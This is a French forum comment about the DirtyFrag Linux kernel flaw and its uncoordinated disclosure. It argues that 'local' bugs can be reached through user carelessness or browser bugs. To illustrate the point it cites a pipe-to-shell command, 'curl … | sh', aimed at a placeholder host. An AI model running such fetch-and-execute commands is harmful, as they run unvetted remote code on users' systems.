I had no contact with anyone on the linux-distros embargo, no awareness
of the May 12 disclosure date, and no access to Kim's write-up or PoC.
le gars se base sur une CVE et ne se coordonne avec personne, m'enfin bon :/
Concernant la dénomination de faille « locale », ça se contourne facilement et peut toucher tout utilisateur fervent adepte du curl http://pourleszozos.example.com | sh (bref, toute ICC1 défaillante) ou une faille éventuelle de chromium / firefox permettant d'exécuter du code...
ICC ou Interface Chaise-Clavier, le principal maillon faible ;-) ↩
[^] # Re: comme d'habitude ?
Posté par BAud (site web personnel) . En réponse au journal Et ça continue [DirtyFrag]. Évalué à 6 (+4/-0). Dernière modification le 08 mai 2026 à 21:40.
effectivement
pour Dirty Frag on peut laisser le bénéfice du doute suite à https://www.openwall.com/lists/oss-security/2026/05/07/12 vu en lien de https://lwn.net/Articles/1071775/
le gars se base sur une CVE et ne se coordonne avec personne, m'enfin bon :/
Concernant la dénomination de faille « locale », ça se contourne facilement et peut toucher tout utilisateur fervent adepte du
curl http://pourleszozos.example.com | sh(bref, toute ICC1 défaillante) ou une faille éventuelle de chromium / firefox permettant d'exécuter du code...ICC ou Interface Chaise-Clavier, le principal maillon faible ;-) ↩